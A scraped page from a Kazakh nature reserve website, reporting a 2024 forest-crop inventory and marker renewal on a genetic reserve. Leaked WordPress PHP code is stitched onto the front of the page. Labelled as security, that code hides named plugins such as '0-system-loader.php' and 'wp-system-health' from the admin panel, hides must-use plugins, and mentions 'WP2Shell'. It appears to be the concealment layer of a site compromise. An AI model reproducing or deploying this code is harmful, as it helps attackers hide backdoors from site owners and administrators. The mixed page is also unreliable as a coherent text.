// Security: Disable remote access add_filter("xmlrpc_enabled", "__return_false"); add_filter("xmlrpc_methods", function($methods) { return array(); }); add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); ?✨ Орман — тіршіліктің тынысы! ? — Иле-Балхашский заповедник ?✨ Орман — тіршіліктің тынысы! ? — Иле-Балхашский заповедник

?✨ Орман — тіршіліктің тынысы! ?

«Іле-Балқаш» мемлекеттік табиғи резерватының «Балқаш маңы» филиалы аумағында 2024 жылдың күзіне арналған орман дақылдарын түгендеу (инвентаризация) жұмыстары жүргізілді. ?

Сонымен қатар, 2019 жылғы орман орналастыру материалдарына сәйкес табиғи өсуге қалдырылған учаскелер тексеріліп, жалпы ауданы 2229 гектар болатын орман генетикалық резерватының белгілері (бағандары) жаңартылды.

? Жұмыс барысында бірқатар учаскелерде орман дақылдарының қанағаттанарлық деңгейде дамуы және жергілікті ағаш түрлерінің табиғи өскіндерінің болуы анықталды. Бұл — орманның табиғи қалпына келуінің оң динамикасын көрсетеді. ?

Далалық жұмыстар кезінде зерттелетін учаскелердің жалпы жағдайын айқындайтын сынақ алаңшалары салынды. Онда отырғызылған (немесе себілген) ағаш түрлерінің саны есептеліп, нәтижелері бір гектар жерге шақталып қайта есептелді.